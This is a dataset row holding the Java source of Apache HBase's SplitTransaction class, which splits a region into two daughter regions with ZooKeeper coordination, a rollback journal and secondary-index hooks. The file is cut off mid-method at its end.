Dataset columns:
max_stars_count: int64 (301 to 224k)
text: string (lengths 6 to 1.05M)
token_count: int64 (3 to 727k)
407
<gh_stars>100-1000 /** * Copyright 2010 The Apache Software Foundation * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.hbase.regionserver; import java.io.IOException; import java.util.ArrayList; import java.util.List; import java.util.ListIterator; import java.util.concurrent.Callable; import java.util.concurrent.ExecutionException; import java.util.concurrent.Executors; import java.util.concurrent.Future; import java.util.concurrent.ThreadFactory; import java.util.concurrent.ThreadPoolExecutor; import java.util.concurrent.TimeUnit; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.fs.FileStatus; import org.apache.hadoop.fs.FileSystem; import org.apache.hadoop.fs.Path; import org.apache.hadoop.hbase.HConstants; import org.apache.hadoop.hbase.HBaseFileSystem; import org.apache.hadoop.hbase.HRegionInfo; import org.apache.hadoop.hbase.NotAllMetaRegionsOnlineException; import org.apache.hadoop.hbase.Server; import org.apache.hadoop.hbase.ServerName; import org.apache.hadoop.hbase.catalog.CatalogTracker; import org.apache.hadoop.hbase.catalog.MetaEditor; import org.apache.hadoop.hbase.client.HTable; import org.apache.hadoop.hbase.client.Put; import org.apache.hadoop.hbase.executor.EventHandler.EventType; import org.apache.hadoop.hbase.executor.RegionTransitionData; import org.apache.hadoop.hbase.io.Reference.Range; import org.apache.hadoop.hbase.util.Bytes; import org.apache.hadoop.hbase.util.CancelableProgressable; import org.apache.hadoop.hbase.util.EnvironmentEdgeManager; import org.apache.hadoop.hbase.util.FSUtils; import org.apache.hadoop.hbase.util.HasThread; import org.apache.hadoop.hbase.util.PairOfSameType; import org.apache.hadoop.hbase.util.Writables; import org.apache.hadoop.hbase.zookeeper.ZKAssign; import org.apache.hadoop.hbase.zookeeper.ZKUtil; import org.apache.hadoop.hbase.zookeeper.ZooKeeperWatcher; import org.apache.zookeeper.KeeperException; import org.apache.zookeeper.KeeperException.NodeExistsException; import com.google.common.util.concurrent.ThreadFactoryBuilder; /** * Executes region split as a "transaction". Call {@link #prepare()} to setup * the transaction, {@link #execute(Server, RegionServerServices)} to run the * transaction and {@link #rollback(Server, RegionServerServices)} to cleanup if execute fails. * * <p>Here is an example of how you would use this class: * <pre> * SplitTransaction st = new SplitTransaction(this.conf, parent, midKey) * if (!st.prepare()) return; * try { * st.execute(server, services); * } catch (IOException ioe) { * try { * st.rollback(server, services); * return; * } catch (RuntimeException e) { * myAbortable.abort("Failed split, abort"); * } * } * </Pre> * <p>This class is not thread safe. 
Caller needs ensure split is run by * one thread only. */ public class SplitTransaction { private static final Log LOG = LogFactory.getLog(SplitTransaction.class); private static final String SPLITDIR = ".splits"; /* * Region to split */ private final HRegion parent; private HRegionInfo hri_a; private HRegionInfo hri_b; private Path splitdir; private long fileSplitTimeout = 30000; private int znodeVersion = -1; /* * Row to split around */ private final byte [] splitrow; /** * Types to add to the transaction journal. * Each enum is a step in the split transaction. Used to figure how much * we need to rollback. */ enum JournalEntry { /** * Set region as in transition, set it into SPLITTING state. */ SET_SPLITTING_IN_ZK, /** * We created the temporary split data directory. */ CREATE_SPLIT_DIR, /** * Closed the parent region. */ CLOSED_PARENT_REGION, /** * The parent has been taken out of the server's online regions list. */ OFFLINED_PARENT, /** * Started in on creation of the first daughter region. */ STARTED_REGION_A_CREATION, /** * Started in on the creation of the second daughter region. */ STARTED_REGION_B_CREATION, /** * Point of no return. * If we got here, then transaction is not recoverable other than by * crashing out the regionserver. */ PONR } /* * Journal of how far the split transaction has progressed. */ private final List<JournalEntry> journal = new ArrayList<JournalEntry>(); static final String INDEX_TABLE_SUFFIX = "_idx"; /** * Constructor * @param r Region to split * @param splitrow Row to split around */ public SplitTransaction(final HRegion r, final byte [] splitrow) { this.parent = r; this.splitrow = splitrow; this.splitdir = getSplitDir(this.parent); } /** * Does checks on split inputs. * @return <code>true</code> if the region is splittable else * <code>false</code> if it is not (e.g. its already closed, etc.). */ public boolean prepare() { if (!this.parent.isSplittable()) return false; // Split key can be null if this region is unsplittable; i.e. has refs. if (this.splitrow == null) return false; HRegionInfo hri = this.parent.getRegionInfo(); parent.prepareToSplit(); // Check splitrow. byte [] startKey = hri.getStartKey(); byte [] endKey = hri.getEndKey(); if (Bytes.equals(startKey, splitrow) || !this.parent.getRegionInfo().containsRow(splitrow)) { LOG.info("Split row is not inside region key range or is equal to " + "startkey: " + Bytes.toStringBinary(this.splitrow)); return false; } long rid = getDaughterRegionIdTimestamp(hri); this.hri_a = new HRegionInfo(hri.getTableName(), startKey, this.splitrow, false, rid); this.hri_b = new HRegionInfo(hri.getTableName(), this.splitrow, endKey, false, rid); return true; } /** * Calculate daughter regionid to use. * @param hri Parent {@link HRegionInfo} * @return Daughter region id (timestamp) to use. */ private static long getDaughterRegionIdTimestamp(final HRegionInfo hri) { long rid = EnvironmentEdgeManager.currentTimeMillis(); // Regionid is timestamp. Can't be less than that of parent else will insert // at wrong location in .META. (See HBASE-710). if (rid < hri.getRegionId()) { LOG.warn("Clock skew; parent regions id is " + hri.getRegionId() + " but current time here is " + rid); rid = hri.getRegionId() + 1; } return rid; } private static IOException closedByOtherException = new IOException( "Failed to close region: already closed by another thread"); /** * Prepare the regions and region files. * @param server Hosting server instance. 
Can be null when testing (won't try * and update in zk if a null server) * @param services Used to online/offline regions. * @throws IOException If thrown, transaction failed. Call {@link #rollback(Server, RegionServerServices)} * @return Regions created */ /* package */PairOfSameType<HRegion> createDaughters(final Server server, final RegionServerServices services) throws IOException { LOG.info("Starting split of region " + this.parent); boolean secondaryIndex = server == null ? false : server.getConfiguration().getBoolean("hbase.use.secondary.index", false); boolean indexRegionAvailable = false; if ((server != null && server.isStopped()) || (services != null && services.isStopping())) { throw new IOException("Server is stopped or stopping"); } assert !this.parent.lock.writeLock().isHeldByCurrentThread(): "Unsafe to hold write lock while performing RPCs"; // Coprocessor callback if (this.parent.getCoprocessorHost() != null) { this.parent.getCoprocessorHost().preSplit(); } boolean testing = server == null? true: server.getConfiguration().getBoolean("hbase.testing.nocluster", false); PairOfSameType<HRegion> daughterRegionsPair = stepsBeforeAddingPONR(server, services, testing); SplitInfo info = null; // Coprocessor callback if (secondaryIndex) { if (this.parent.getCoprocessorHost() != null) { info = this.parent.getCoprocessorHost().preSplitBeforePONR(this.splitrow); if (info == null) { throw new IOException("Pre split of Index region has failed."); } if ((info.getSplitTransaction() != null && info.getDaughters() != null)) { indexRegionAvailable = true; } } } // add one hook // do the step till started_region_b_creation // This is the point of no return. Adding subsequent edits to .META. as we // do below when we do the daughter opens adding each to .META. can fail in // various interesting ways the most interesting of which is a timeout // BUT the edits all go through (See HBASE-3872). IF we reach the PONR // then subsequent failures need to crash out this regionserver; the // server shutdown processing should be able to fix-up the incomplete split. // The offlined parent will have the daughters as extra columns. If // we leave the daughter regions in place and do not remove them when we // crash out, then they will have their references to the parent in place // still and the server shutdown fixup of .META. will point to these // regions. // We should add PONR JournalEntry before offlineParentInMeta,so even if // OfflineParentInMeta timeout,this will cause regionserver exit,and then // master ServerShutdownHandler will fix daughter & avoid data loss. (See // HBase-4562). this.journal.add(JournalEntry.PONR); // Edit parent in meta. Offlines parent region and adds splita and splitb. 
if (!testing) { if (!indexRegionAvailable) { MetaEditor.offlineParentInMeta(server.getCatalogTracker(), this.parent.getRegionInfo(), daughterRegionsPair.getFirst().getRegionInfo(), daughterRegionsPair.getSecond() .getRegionInfo()); } else { offlineParentInMetaBothIndexAndMainRegion(server.getCatalogTracker(), this.parent.getRegionInfo(), daughterRegionsPair.getFirst().getRegionInfo(), daughterRegionsPair.getSecond().getRegionInfo(), info.getSplitTransaction().parent.getRegionInfo(), info.getDaughters().getFirst() .getRegionInfo(), info.getDaughters().getSecond().getRegionInfo()); } } return daughterRegionsPair; } private static void offlineParentInMetaBothIndexAndMainRegion(CatalogTracker catalogTracker, HRegionInfo parent, final HRegionInfo a, final HRegionInfo b, final HRegionInfo parentIdx, final HRegionInfo idxa, final HRegionInfo idxb) throws NotAllMetaRegionsOnlineException, IOException { HRegionInfo copyOfParent = new HRegionInfo(parent); copyOfParent.setOffline(true); copyOfParent.setSplit(true); List<Put> list = new ArrayList<Put>(); Put put = new Put(copyOfParent.getRegionName()); put.add(HConstants.CATALOG_FAMILY, HConstants.REGIONINFO_QUALIFIER, Writables.getBytes(copyOfParent)); put.add(HConstants.CATALOG_FAMILY, HConstants.SPLITA_QUALIFIER, Writables.getBytes(a)); put.add(HConstants.CATALOG_FAMILY, HConstants.SPLITB_QUALIFIER, Writables.getBytes(b)); list.add(put); HRegionInfo copyOfIdxParent = new HRegionInfo(parentIdx); copyOfIdxParent.setOffline(true); copyOfIdxParent.setSplit(true); Put putForIdxRegion = new Put(copyOfIdxParent.getRegionName()); putForIdxRegion.add(HConstants.CATALOG_FAMILY, HConstants.REGIONINFO_QUALIFIER, Writables.getBytes(copyOfIdxParent)); putForIdxRegion.add(HConstants.CATALOG_FAMILY, HConstants.SPLITA_QUALIFIER, Writables.getBytes(idxa)); putForIdxRegion.add(HConstants.CATALOG_FAMILY, HConstants.SPLITB_QUALIFIER, Writables.getBytes(idxb)); list.add(putForIdxRegion); putToMetaTable(catalogTracker, list); LOG.info("Offlined parent region " + parent.getRegionNameAsString() + " in META"); } private static void putToMetaTable(final CatalogTracker ct, final List<Put> p) throws IOException { org.apache.hadoop.hbase.client.HConnection c = ct.getConnection(); if (c == null) throw new NullPointerException("No connection"); put(new HTable(ct.getConnection().getConfiguration(), HConstants.META_TABLE_NAME), p); } private static void put(final HTable t, final List<Put> p) throws IOException { try { t.put(p); } finally { t.close(); } } public PairOfSameType<HRegion> stepsBeforeAddingPONR(final Server server, final RegionServerServices services, boolean testing) throws IOException { // Set ephemeral SPLITTING znode up in zk. Mocked servers sometimes don't // have zookeeper so don't do zk stuff if server or zookeeper is null if (server != null && server.getZooKeeper() != null) { try { createNodeSplitting(server.getZooKeeper(), this.parent.getRegionInfo(), server.getServerName()); } catch (KeeperException e) { throw new IOException("Failed creating SPLITTING znode on " + this.parent.getRegionNameAsString(), e); } } this.journal.add(JournalEntry.SET_SPLITTING_IN_ZK); if (server != null && server.getZooKeeper() != null) { try { // Transition node from SPLITTING to SPLITTING after creating the split node. // Master will get the callback for node change only if the transition is successful. 
// Note that if the transition fails then the rollback will delete the created znode // TODO : May be we can add some new state to znode and handle the new state incase of success/failure this.znodeVersion = transitionNodeSplitting(server.getZooKeeper(), this.parent.getRegionInfo(), server.getServerName(), -1); } catch (KeeperException e) { throw new IOException("Failed setting SPLITTING znode on " + this.parent.getRegionNameAsString(), e); } } createSplitDir(this.parent.getFilesystem(), this.splitdir); this.journal.add(JournalEntry.CREATE_SPLIT_DIR); List<StoreFile> hstoreFilesToSplit = null; Exception exceptionToThrow = null; try{ hstoreFilesToSplit = this.parent.close(false); } catch (Exception e) { exceptionToThrow = e; } if (exceptionToThrow == null && hstoreFilesToSplit == null) { // The region was closed by a concurrent thread. We can't continue // with the split, instead we must just abandon the split. If we // reopen or split this could cause problems because the region has // probably already been moved to a different server, or is in the // process of moving to a different server. exceptionToThrow = closedByOtherException; } if (exceptionToThrow != closedByOtherException) { this.journal.add(JournalEntry.CLOSED_PARENT_REGION); } if (exceptionToThrow != null) { if (exceptionToThrow instanceof IOException) throw (IOException)exceptionToThrow; throw new IOException(exceptionToThrow); } if (!testing) { services.removeFromOnlineRegions(this.parent.getRegionInfo().getEncodedName()); } this.journal.add(JournalEntry.OFFLINED_PARENT); // TODO: If splitStoreFiles were multithreaded would we complete steps in // less elapsed time? St.Ack 20100920 // // splitStoreFiles creates daughter region dirs under the parent splits dir // Nothing to unroll here if failure -- clean up of CREATE_SPLIT_DIR will // clean this up. splitStoreFiles(this.splitdir, hstoreFilesToSplit); // Log to the journal that we are creating region A, the first daughter // region. We could fail halfway through. If we do, we could have left // stuff in fs that needs cleanup -- a storefile or two. Thats why we // add entry to journal BEFORE rather than AFTER the change. this.journal.add(JournalEntry.STARTED_REGION_A_CREATION); HRegion a = createDaughterRegion(this.hri_a, this.parent.rsServices); // Ditto this.journal.add(JournalEntry.STARTED_REGION_B_CREATION); HRegion b = createDaughterRegion(this.hri_b, this.parent.rsServices); return new PairOfSameType<HRegion>(a,b); } /** * Perform time consuming opening of the daughter regions. * @param server Hosting server instance. Can be null when testing (won't try * and update in zk if a null server) * @param services Used to online/offline regions. * @param a first daughter region * @param a second daughter region * @throws IOException If thrown, transaction failed. Call {@link #rollback(Server, RegionServerServices)} */ /* package */void openDaughters(final Server server, final RegionServerServices services, HRegion a, HRegion b) throws IOException { boolean stopped = server != null && server.isStopped(); boolean stopping = services != null && services.isStopping(); // TODO: Is this check needed here? if (stopped || stopping) { LOG.info("Not opening daughters " + b.getRegionInfo().getRegionNameAsString() + " and " + a.getRegionInfo().getRegionNameAsString() + " because stopping=" + stopping + ", stopped=" + stopped); } else { // Open daughters in parallel. 
DaughterOpener aOpener = new DaughterOpener(server, a); DaughterOpener bOpener = new DaughterOpener(server, b); aOpener.start(); bOpener.start(); try { aOpener.join(); bOpener.join(); } catch (InterruptedException e) { Thread.currentThread().interrupt(); throw new IOException("Interrupted " + e.getMessage()); } if (aOpener.getException() != null) { throw new IOException("Failed " + aOpener.getName(), aOpener.getException()); } if (bOpener.getException() != null) { throw new IOException("Failed " + bOpener.getName(), bOpener.getException()); } if (services != null) { try { // add 2nd daughter first (see HBASE-4335) services.postOpenDeployTasks(b, server.getCatalogTracker(), true); // Should add it to OnlineRegions services.addToOnlineRegions(b); services.postOpenDeployTasks(a, server.getCatalogTracker(), true); services.addToOnlineRegions(a); } catch (KeeperException ke) { throw new IOException(ke); } } } } /** * Finish off split transaction, transition the zknode * @param server Hosting server instance. Can be null when testing (won't try * and update in zk if a null server) * @param services Used to online/offline regions. * @param a first daughter region * @param a second daughter region * @throws IOException If thrown, transaction failed. Call {@link #rollback(Server, RegionServerServices)} */ /* package */void transitionZKNode(final Server server, final RegionServerServices services, HRegion a, HRegion b) throws IOException { // Tell master about split by updating zk. If we fail, abort. if (server != null && server.getZooKeeper() != null) { try { this.znodeVersion = transitionNodeSplit(server.getZooKeeper(), parent.getRegionInfo(), a.getRegionInfo(), b.getRegionInfo(), server.getServerName(), this.znodeVersion); int spins = 0; // Now wait for the master to process the split. We know it's done // when the znode is deleted. The reason we keep tickling the znode is // that it's possible for the master to miss an event. do { if (spins % 10 == 0) { LOG.debug("Still waiting on the master to process the split for " + this.parent.getRegionInfo().getEncodedName()); } Thread.sleep(100); // When this returns -1 it means the znode doesn't exist this.znodeVersion = tickleNodeSplit(server.getZooKeeper(), parent.getRegionInfo(), a.getRegionInfo(), b.getRegionInfo(), server.getServerName(), this.znodeVersion); spins++; } while (this.znodeVersion != -1 && !server.isStopped() && !services.isStopping()); } catch (Exception e) { if (e instanceof InterruptedException) { Thread.currentThread().interrupt(); } throw new IOException("Failed telling master about split", e); } } // Coprocessor callback if (this.parent.getCoprocessorHost() != null) { this.parent.getCoprocessorHost().postSplit(a,b); } // Leaving here, the splitdir with its dross will be in place but since the // split was successful, just leave it; it'll be cleaned when parent is // deleted and cleaned up. } /** * Run the transaction. * @param server Hosting server instance. Can be null when testing (won't try * and update in zk if a null server) * @param services Used to online/offline regions. * @throws IOException If thrown, transaction failed. 
Call {@link #rollback(Server, RegionServerServices)} * @return Regions created * @throws IOException * @see #rollback(Server, RegionServerServices) */ public PairOfSameType<HRegion> execute(final Server server, final RegionServerServices services) throws IOException { PairOfSameType<HRegion> regions = createDaughters(server, services); if (this.parent.getCoprocessorHost() != null) { this.parent.getCoprocessorHost().preSplitAfterPONR(); } stepsAfterPONR(server, services, regions); return regions; } public void stepsAfterPONR(final Server server, final RegionServerServices services, PairOfSameType<HRegion> regions) throws IOException { openDaughters(server, services, regions.getFirst(), regions.getSecond()); transitionZKNode(server, services, regions.getFirst(), regions.getSecond()); } /* * Open daughter region in its own thread. * If we fail, abort this hosting server. */ class DaughterOpener extends HasThread { private final Server server; private final HRegion r; private Throwable t = null; DaughterOpener(final Server s, final HRegion r) { super((s == null? "null-services": s.getServerName()) + "-daughterOpener=" + r.getRegionInfo().getEncodedName()); setDaemon(true); this.server = s; this.r = r; } /** * @return Null if open succeeded else exception that causes us fail open. * Call it after this thread exits else you may get wrong view on result. */ Throwable getException() { return this.t; } @Override public void run() { try { openDaughterRegion(this.server, r); } catch (Throwable t) { this.t = t; } } } /** * Open daughter regions, add them to online list and update meta. * @param server * @param services Can be null when testing. * @param daughter * @throws IOException * @throws KeeperException */ void openDaughterRegion(final Server server, final HRegion daughter) throws IOException, KeeperException { HRegionInfo hri = daughter.getRegionInfo(); LoggingProgressable reporter = server == null? null: new LoggingProgressable(hri, server.getConfiguration()); daughter.openHRegion(reporter); } static class LoggingProgressable implements CancelableProgressable { private final HRegionInfo hri; private long lastLog = -1; private final long interval; LoggingProgressable(final HRegionInfo hri, final Configuration c) { this.hri = hri; this.interval = c.getLong("hbase.regionserver.split.daughter.open.log.interval", 10000); } @Override public boolean progress() { long now = System.currentTimeMillis(); if (now - lastLog > this.interval) { LOG.info("Opening " + this.hri.getRegionNameAsString()); this.lastLog = now; } return true; } } private static Path getSplitDir(final HRegion r) { return new Path(r.getRegionDir(), SPLITDIR); } /** * @param fs Filesystem to use * @param splitdir Directory to store temporary split data in * @throws IOException If <code>splitdir</code> already exists or we fail * to create it. * @see #cleanupSplitDir(FileSystem, Path) */ void createSplitDir(final FileSystem fs, final Path splitdir) throws IOException { if (fs.exists(splitdir)) { LOG.info("The " + splitdir + " directory exists. Hence deleting it to recreate it"); if (!HBaseFileSystem.deleteDirFromFileSystem(fs, splitdir)) { throw new IOException("Failed deletion of " + splitdir + " before creating them again."); } } if (!HBaseFileSystem.makeDirOnFileSystem(fs, splitdir)) throw new IOException("Failed create of " + splitdir); } private static void cleanupSplitDir(final FileSystem fs, final Path splitdir) throws IOException { // Splitdir may have been cleaned up by reopen of the parent dir. 
deleteDir(fs, splitdir, false); } /** * @param fs Filesystem to use * @param dir Directory to delete * @param mustPreExist If true, we'll throw exception if <code>dir</code> * does not preexist, else we'll just pass. * @throws IOException Thrown if we fail to delete passed <code>dir</code> */ private static void deleteDir(final FileSystem fs, final Path dir, final boolean mustPreExist) throws IOException { if (!fs.exists(dir)) { if (mustPreExist) throw new IOException(dir.toString() + " does not exist!"); } else if (!HBaseFileSystem.deleteDirFromFileSystem(fs, dir)) { throw new IOException("Failed delete of " + dir); } } protected void splitStoreFiles(final Path splitdir, final List<StoreFile> hstoreFilesToSplit) throws IOException { if (hstoreFilesToSplit == null) { // Could be null because close didn't succeed -- for now consider it fatal throw new IOException("Close returned empty list of StoreFiles"); } // The following code sets up a thread pool executor with as many slots as // there's files to split. It then fires up everything, waits for // completion and finally checks for any exception int nbFiles = hstoreFilesToSplit.size(); boolean secondaryIndex = this.parent.getConf().getBoolean("hbase.use.secondary.index", false); if (secondaryIndex) { String idxTableName = this.parent.getTableDesc().getNameAsString(); if (isIndexTable(idxTableName)) if (nbFiles == 0) { LOG.debug("Setting number of threads for ThreadPoolExecutor to 1 since IndexTable " + idxTableName + " doesn't have any store files "); nbFiles = 1; } } ThreadFactoryBuilder builder = new ThreadFactoryBuilder(); builder.setNameFormat("StoreFileSplitter-%1$d"); ThreadFactory factory = builder.build(); ThreadPoolExecutor threadPool = (ThreadPoolExecutor) Executors.newFixedThreadPool(nbFiles, factory); List<Future<Void>> futures = new ArrayList<Future<Void>>(nbFiles); // Split each store file. for (StoreFile sf: hstoreFilesToSplit) { //splitStoreFile(sf, splitdir); StoreFileSplitter sfs = new StoreFileSplitter(sf, splitdir); futures.add(threadPool.submit(sfs)); } // Shutdown the pool threadPool.shutdown(); // Wait for all the tasks to finish try { boolean stillRunning = !threadPool.awaitTermination( this.fileSplitTimeout, TimeUnit.MILLISECONDS); if (stillRunning) { threadPool.shutdownNow(); // wait for the thread to shutdown completely. 
while (!threadPool.isTerminated()) { Thread.sleep(50); } throw new IOException("Took too long to split the" + " files and create the references, aborting split"); } } catch (InterruptedException e) { Thread.currentThread().interrupt(); throw new IOException("Interrupted while waiting for file splitters", e); } // Look for any exception for (Future<Void> future: futures) { try { future.get(); } catch (InterruptedException e) { Thread.currentThread().interrupt(); throw new IOException( "Interrupted while trying to get the results of file splitters", e); } catch (ExecutionException e) { throw new IOException(e); } } } private boolean isIndexTable(String idxTableName) { return idxTableName.endsWith(INDEX_TABLE_SUFFIX); } private void splitStoreFile(final StoreFile sf, final Path splitdir) throws IOException { FileSystem fs = this.parent.getFilesystem(); byte [] family = sf.getFamily(); String encoded = this.hri_a.getEncodedName(); Path storedir = Store.getStoreHomedir(splitdir, encoded, family); StoreFile.split(fs, storedir, sf, this.splitrow, Range.bottom); encoded = this.hri_b.getEncodedName(); storedir = Store.getStoreHomedir(splitdir, encoded, family); StoreFile.split(fs, storedir, sf, this.splitrow, Range.top); } /** * Utility class used to do the file splitting / reference writing * in parallel instead of sequentially. */ class StoreFileSplitter implements Callable<Void> { private final StoreFile sf; private final Path splitdir; /** * Constructor that takes what it needs to split * @param sf which file * @param splitdir where the splitting is done */ public StoreFileSplitter(final StoreFile sf, final Path splitdir) { this.sf = sf; this.splitdir = splitdir; } public Void call() throws IOException { splitStoreFile(sf, splitdir); return null; } } /** * @param hri Spec. for daughter region to open. * @param flusher Flusher this region should use. * @return Created daughter HRegion. * @throws IOException * @see #cleanupDaughterRegion(FileSystem, Path, HRegionInfo) */ HRegion createDaughterRegion(final HRegionInfo hri, final RegionServerServices rsServices) throws IOException { // Package private so unit tests have access. FileSystem fs = this.parent.getFilesystem(); Path regionDir = getSplitDirForDaughter(this.parent.getFilesystem(), this.splitdir, hri); HRegion r = HRegion.newHRegion(this.parent.getTableDir(), this.parent.getLog(), fs, this.parent.getBaseConf(), hri, this.parent.getTableDesc(), rsServices); long halfParentReadRequestCount = this.parent.getReadRequestsCount() / 2; r.readRequestsCount.set(halfParentReadRequestCount); r.setOpMetricsReadRequestCount(halfParentReadRequestCount); long halfParentWriteRequest = this.parent.getWriteRequestsCount() / 2; r.writeRequestsCount.set(halfParentWriteRequest); r.setOpMetricsWriteRequestCount(halfParentWriteRequest); HRegion.moveInitialFilesIntoPlace(fs, regionDir, r.getRegionDir()); return r; } private static void cleanupDaughterRegion(final FileSystem fs, final Path tabledir, final String encodedName) throws IOException { Path regiondir = HRegion.getRegionDir(tabledir, encodedName); // Dir may not preexist. deleteDir(fs, regiondir, false); } /* * Get the daughter directories in the splits dir. The splits dir is under * the parent regions' directory. * @param fs * @param splitdir * @param hri * @return Path to daughter split dir. 
* @throws IOException */ private static Path getSplitDirForDaughter(final FileSystem fs, final Path splitdir, final HRegionInfo hri) throws IOException { return new Path(splitdir, hri.getEncodedName()); } /** * @param server Hosting server instance (May be null when testing). * @param services * @throws IOException If thrown, rollback failed. Take drastic action. * @return True if we successfully rolled back, false if we got to the point * of no return and so now need to abort the server to minimize damage. */ public boolean rollback(final Server server, final RegionServerServices services) throws IOException { // Coprocessor callback boolean secondaryIndex = server == null ? false : server.getConfiguration().getBoolean("hbase.use.secondary.index", false); if (secondaryIndex) { if (this.parent.getCoprocessorHost() != null) { this.parent.getCoprocessorHost().preRollBack(); } } boolean result = true; FileSystem fs = this.parent.getFilesystem(); ListIterator<JournalEntry> iterator = this.journal.listIterator(this.journal.size()); // Iterate in reverse. while (iterator.hasPrevious()) { JournalEntry je = iterator.previous(); switch(je) { case SET_SPLITTING_IN_ZK: if (server != null && server.getZooKeeper() != null) { cleanZK(server, this.parent.getRegionInfo()); } break; case CREATE_SPLIT_DIR: this.parent.writestate.writesEnabled = true; cleanupSplitDir(fs, this.splitdir); break; case CLOSED_PARENT_REGION: try { // So, this returns a seqid but if we just closed and then reopened, we // should be ok. On close, we flushed using sequenceid obtained from // hosting regionserver so no need to propagate the sequenceid returned // out of initialize below up into regionserver as we normally do. // TODO: Verify. this.parent.initialize(); } catch (IOException e) { LOG.error("Failed rollbacking CLOSED_PARENT_REGION of region " + this.parent.getRegionNameAsString(), e); throw new RuntimeException(e); } break; case STARTED_REGION_A_CREATION: cleanupDaughterRegion(fs, this.parent.getTableDir(), this.hri_a.getEncodedName()); break; case STARTED_REGION_B_CREATION: cleanupDaughterRegion(fs, this.parent.getTableDir(), this.hri_b.getEncodedName()); break; case OFFLINED_PARENT: if (services != null) services.addToOnlineRegions(this.parent); break; case PONR: // We got to the point-of-no-return so we need to just abort. Return // immediately. Do not clean up created daughter regions. They need // to be in place so we don't delete the parent region mistakenly. // See HBASE-3872. return false; default: throw new RuntimeException("Unhandled journal entry: " + je); } } return result; } HRegionInfo getFirstDaughter() { return hri_a; } HRegionInfo getSecondDaughter() { return hri_b; } // For unit testing. Path getSplitDir() { return this.splitdir; } /** * Clean up any split detritus that may have been left around from previous * split attempts. * Call this method on initial region deploy. Cleans up any mess * left by previous deploys of passed <code>r</code> region. * @param r * @throws IOException */ static void cleanupAnySplitDetritus(final HRegion r) throws IOException { Path splitdir = getSplitDir(r); FileSystem fs = r.getFilesystem(); if (!fs.exists(splitdir)) return; // Look at the splitdir. It could have the encoded names of the daughter // regions we tried to make. See if the daughter regions actually got made // out under the tabledir. If here under splitdir still, then the split did // not complete. Try and do cleanup. 
This code WILL NOT catch the case // where we successfully created daughter a but regionserver crashed during // the creation of region b. In this case, there'll be an orphan daughter // dir in the filesystem. TOOD: Fix. FileStatus [] daughters = fs.listStatus(splitdir, new FSUtils.DirFilter(fs)); for (int i = 0; i < daughters.length; i++) { cleanupDaughterRegion(fs, r.getTableDir(), daughters[i].getPath().getName()); } cleanupSplitDir(r.getFilesystem(), splitdir); LOG.info("Cleaned up old failed split transaction detritus: " + splitdir); } private static void cleanZK(final Server server, final HRegionInfo hri) { try { // Only delete if its in expected state; could have been hijacked. ZKAssign.deleteNode(server.getZooKeeper(), hri.getEncodedName(), EventType.RS_ZK_REGION_SPLITTING); } catch (KeeperException e) { server.abort("Failed cleanup of " + hri.getRegionNameAsString(), e); } } /** * Creates a new ephemeral node in the SPLITTING state for the specified region. * Create it ephemeral in case regionserver dies mid-split. * * <p>Does not transition nodes from other states. If a node already exists * for this region, a {@link NodeExistsException} will be thrown. * * @param zkw zk reference * @param region region to be created as offline * @param serverName server event originates from * @return Version of znode created. * @throws KeeperException * @throws IOException */ void createNodeSplitting(final ZooKeeperWatcher zkw, final HRegionInfo region, final ServerName serverName) throws KeeperException, IOException { LOG.debug(zkw.prefix("Creating ephemeral node for " + region.getEncodedName() + " in SPLITTING state")); RegionTransitionData data = new RegionTransitionData(EventType.RS_ZK_REGION_SPLITTING, region.getRegionName(), serverName); String node = ZKAssign.getNodeName(zkw, region.getEncodedName()); if (!ZKUtil.createEphemeralNodeAndWatch(zkw, node, data.getBytes())) { throw new IOException("Failed create of ephemeral " + node); } } /** * Transitions an existing node for the specified region which is * currently in the SPLITTING state to be in the SPLIT state. Converts the * ephemeral SPLITTING znode to an ephemeral SPLIT node. Master cleans up * SPLIT znode when it reads it (or if we crash, zk will clean it up). * * <p>Does not transition nodes from other states. If for some reason the * node could not be transitioned, the method returns -1. If the transition * is successful, the version of the node after transition is returned. * * <p>This method can fail and return false for three different reasons: * <ul><li>Node for this region does not exist</li> * <li>Node for this region is not in SPLITTING state</li> * <li>After verifying SPLITTING state, update fails because of wrong version * (this should never actually happen since an RS only does this transition * following a transition to SPLITTING. if two RS are conflicting, one would * fail the original transition to SPLITTING and not this transition)</li> * </ul> * * <p>Does not set any watches. * * <p>This method should only be used by a RegionServer when completing the * open of a region. 
* * @param zkw zk reference * @param parent region to be transitioned to opened * @param a Daughter a of split * @param b Daughter b of split * @param serverName server event originates from * @return version of node after transition, -1 if unsuccessful transition * @throws KeeperException if unexpected zookeeper exception * @throws IOException */ private static int transitionNodeSplit(ZooKeeperWatcher zkw, HRegionInfo parent, HRegionInfo a, HRegionInfo b, ServerName serverName, final int znodeVersion) throws KeeperException, IOException { byte [] payload = Writables.getBytes(a, b); return ZKAssign.transitionNode(zkw, parent, serverName, EventType.RS_ZK_REGION_SPLITTING, EventType.RS_ZK_REGION_SPLIT, znodeVersion, payload); } public static class SplitInfo { PairOfSameType<HRegion> pairOfSameType; SplitTransaction st; public void setDaughtersAndTransaction(PairOfSameType<HRegion> pairOfSameType, SplitTransaction st) { this.pairOfSameType = pairOfSameType; this.st = st; } public PairOfSameType<HRegion> getDaughters() { return this.pairOfSameType; } public SplitTransaction getSplitTransaction() { return this.st; } } /** * Added for secondary index. Needed in the hooks to get the parentRegion name * @return */ public HRegion getParent() { return this.parent; } /** * * @param zkw zk reference * @param parent region to be transitioned to splitting * @param serverName server event originates from * @param version znode version * @return version of node after transition, -1 if unsuccessful transition * @throws KeeperException * @throws IOException */ int transitionNodeSplitting(final ZooKeeperWatcher zkw, final HRegionInfo parent, final ServerName serverName, final int version) throws KeeperException, IOException { return ZKAssign.transitionNode(zkw, parent, serverName, EventType.RS_ZK_REGION_SPLITTING, EventType.RS_ZK_REGION_SPLITTING, version); } private static int tickleNodeSplit(ZooKeeperWatcher zkw, HRegionInfo parent, HRegionInfo a, HRegionInfo b, ServerName serverName, final int znodeVersion) throws KeeperException, IOException { byte [] payload = Writables.getBytes(a, b); return 